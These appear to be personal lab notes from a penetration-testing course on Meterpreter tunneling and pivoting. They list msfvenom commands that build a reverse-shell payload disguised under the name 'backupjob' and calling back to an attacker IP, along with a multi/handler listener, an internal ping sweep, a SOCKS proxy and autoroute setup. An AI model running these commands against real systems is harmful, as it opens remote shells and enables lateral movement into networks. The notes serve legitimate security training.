Meterpreter Tunneling & Port Forwarding
June 22, 2024

ssh ubuntu@10.129.53.227

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.113 -f elf -o backupjob LPORT=8080
ls

scp backupjob ubuntu@10.129.53.227:/tmp

cd /tmp
ls
chmod +x backupjob

Now we need a listener in the attacker machine, we will use the msfconsole for this
msfconsole -q
search multi/handler
options
set payload linux/x64/meterpreter/reverse_tcp
set lhost
set lport
run

run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Then for the next question
use auxiliary/server/socks_proxy
options
set SRVPORT 9050

run
*Press enter*
jobs

sudo subl /usr/local/etc/proxychains.conf

use post/multi/manage/autoroute
set session 2
set SUBNET 172.16.5.0
run
# To see the sessions or the linux session we just used this command
sessions -l


Last updated